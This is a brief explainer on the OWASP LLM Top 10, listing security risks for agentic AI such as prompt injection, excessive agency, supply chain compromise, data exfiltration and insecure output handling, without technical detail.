OWASP LLM Top 10: the evolving AI security landscape

As AI agents gain autonomy — executing code, browsing the web, and managing infrastructure — the attack surface expands dramatically. The OWASP LLM Top 10 project tracks the most critical security risks.

Key risks for agentic AI

• Prompt injection — both direct and indirect, remains the top concern as agents process untrusted content
• Excessive agency — agents granted broad tool access without proper guardrails
• Supply chain vulnerabilities — compromised MCP servers, plugins, or model weights
• Data exfiltration — agents accessing and leaking sensitive data through tool use
• Insecure output handling — trusting model outputs without validation

What to watch

The intersection of AI agents and security is one of the fastest-moving areas in the field. Red teaming, adversarial ML research, and prompt injection defenses are all active research frontiers.